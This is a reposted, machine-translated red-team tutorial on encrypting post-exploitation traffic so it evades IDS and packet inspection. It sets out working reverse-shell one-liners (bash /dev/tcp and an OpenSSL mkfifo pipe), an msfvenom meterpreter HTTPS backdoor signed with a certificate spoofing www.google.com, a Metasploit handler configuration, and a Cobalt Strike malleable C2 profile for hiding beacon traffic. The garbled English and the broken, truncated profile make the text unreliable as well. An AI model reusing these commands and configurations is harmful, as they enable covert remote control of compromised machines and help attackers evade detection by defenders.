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Traffic encryption of red blue confrontation (OpenSSL encrypted transmission, MSF traffic encryption, CS modifying profile for traffic encryption)

2022-07-06 06:32:00 zxl2605

This article is reproduced in :https://blog.csdn.net/q20010619/article/details/122006433?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_utm_term~default-1-122006433-blog-122810834.pc_relevant_default&spm=1001.2101.3001.4242.2&utm_relevant_index=4

The red team conducted the subsequent penetration stage of penetration test in order to expand the results , It often needs horizontal penetration , rebound shell, If it rebounds shell It's all plaintext transmission , Unencrypted traffic uses wireshark And other tools, such as packet capture analysis, can directly see the input commands and returned information , And in the Intranet IDS Or the protection software will analyze the flow , Detect attack signatures , It's easy to find out , If the blue team backtracks the attack traffic , You can reproduce the attack process . At this time, the red team attack will leak out , The whole project has to stop

Next, let's look at plaintext transmission , Then introduce some common traffic encryption The method of confusion

Plaintext transmission

Introduction to the environment

  • The attacker Kali:
  • The victim ubuntu:

Because it has entered the post infiltration stage , In the environment, we have obtained the permission of the victim

Let's start with a mistake demonstration , Look at the status of unencrypted traffic

First, the attacker uses nc Listen to the rebound port

nc -lvvp 8080

Then perform a rebound on the victim's machine shell command , Of course, the rebound shell There are many ways , You can see , the bash rebound shell, Apply to linux System , No installation required

bash -i >& /dev/tcp/ 0>&1

About rebound shell The article :

After the connection is successful, execute the command on the attacker and use wireshark Sniff traffic (kali Default installation )


Analyze traffic , see tcp Flow is OK , Right click to select trace flow , You can see the command executed


Openssl The encrypted

On the computer network ,OpenSSL Is an open source software library package , Applications can use this package for secure communication , Avoid eavesdropping , At the same time, confirm the identity of the connector at the other end . This package is widely used in web servers on the Internet

Use the environment in the previous section

Use steps

  1. 1. Attack aircraft use OpenSSL Generate a self-signed certificate

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2. Attacker listening port

openssl s_server -quiet -key key.pem -cert cert.pem -port 8080

3. Target machine ( The victim ) Execute bounce shell command

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect > /tmp/s; rm /tmp/s
# IP For the attacker IP, The port is the listening port 

mkfifo Is a function that creates a command pipeline

What is a named pipe

Named pipes are also known as FIFO file , It's a special type of file , It exists as a file name in the file system , But its behavior is similar to that of the pipe without name ( Anonymous pipeline ) similar .

because Linux Everything in can be regarded as a document , Therefore, the use of named pipes becomes very unified with file operation , It also makes its use very convenient , At the same time, we can also use... In the command as usual file names


Use wireshark Analyze traffic , You can see tcp All in the stream are garbled


MSF Traffic encryption

MSF Traffic encryption is based on openssl Encryption function provided , Traffic encryption

Introduction to the environment

  • The attacker Kali:
  • The victim windows:

Use steps

  1. Use it on an attacker openssl Create certificate

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt


  • Generate a backdoor on the attacker

  • msfvenom -p windows/meterpreter/reverse_winhttps LHOST= LPORT=8080 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat
    #  Need modification Lhsot and Lport, Use the certificate just generated to generate the back door 


    The attacker set up a listener

    Two additional options are required when configuring listeners . This is to inform the handler of the certificate it will use ( Same as payload ), And execute... When receiving the connection SSL Certificate validation

    use exploit/multi/handler 
    set payload windows/meterpreter/reverse_winhttps
    set LHOST
    set LPORT 8080
    set HandlerSSLCert /root/msf/www.google.com.pem
    set StagerVerifySSLCert true

    Copy the generated Trojan file to the victim's machine and go online after execution msf


    Use wireshark Analyze traffic


    CS modify profile Traffic encryption

    because CS Great reputation , It's widely used , Lead to many ids Intrusion detection tools and traffic detection tools can intercept and discover , Especially in terms of flow , If the default certificate is used for penetration and testing , Especially in a highly safe environment , Because the certificate has not been modified , It is easy to detect and intercept traffic , The test report will be returned to the Administrator , The administrator can repair the gap immediately

    Generate certificate modification C2 profile Encryption confusion is actually encrypting traffic transmission , Objective to audit the safety of escape flow , Penetration detector

    1. Generate ssl certificate

      Running cobalt strike Default cobaltstrike.store certificate , Using the default certificate is easy to detect , So you need to generate a new certificate

      stay kali Execute the following command in

    keytool -genkey -alias ocean -keyalg RSA -validity 36500 -keystore ocean.store



    Because of the modification profile To use, fill in the relevant regional information This information is filled in at profile Also use Please don't fill in , Fill in the to save , After the information is confirmed, a message named ocean.store The file of

  • edit CS teamserver Configuration file for

  • set sample_name "ocean POS Malware";
    set sleeptime "5000"; # use a ~30s delay between callbacks
    set jitter "10";
    # throw in a 10% jitter
    set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101Firefox/24.0";
    # Set Certificate 
    https-certificate {
        set CN
        set O
        set C
        set L
        set OU
        set ST
        set validity "365";
    # Set up 
        set keystore "ocean.store";
        set password "123456";
        set alias "ocean";
    # Appoint  DNS beacon  When not in use, designate to  IP  Address 
    set dns_idle "";
    # Each individual  DNS  Force sleep time before request 
    set dns_sleep "0";
    # adopt  DNS  Maximum length of host name when uploading data [0-255]
    set maxdns
    http-post {
        set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php/windowsxp/updcheck.php /hello/flash.php";
        client {
            header "Accept" "text/plain";
            header "Accept-Language" "en-us";
            header "Accept-Encoding" "text/plain";
            header "Content-Type" "application/x-www-form-urlencoded";
            id {
                parameter "id";
            output {
                prepend "&op=1&id=vxeykS&ui=Josh @PC&wv=11&gr=backoff&bv=1.55&data=";
        server {
            output {
    http-get {
        set uri "/updates";
        client {
        metadata {
            prepend "user=";
            header "Cookie";
        server {
            header "Content-Type" "text/plain";
            output {

    Note that the information here should be consistent with the information filled in when generating the file

    Use the command to verify that the configuration is correct

    ./c2lint ocean.profile 

    modify teamserver port

    vim teamserver
    #  Find the port and modify it 

    start-up teamserver

    ./teamserver ip password( password ) ocean.profile

    newly build https Monitor


    After adding the listener, because it uses 443 https port , When the browser accesses, it will prompt that the certificate is invalid , You can view the certificate information


  • Create a back door


  • The victim was executed online , Use wireshark Caught analysis , Traffic has been encrypted

  • The knowledge points of the article match the official knowledge files , You can further learn relevant knowledge
    Under perfection , There must be flaws
    Wechat business card
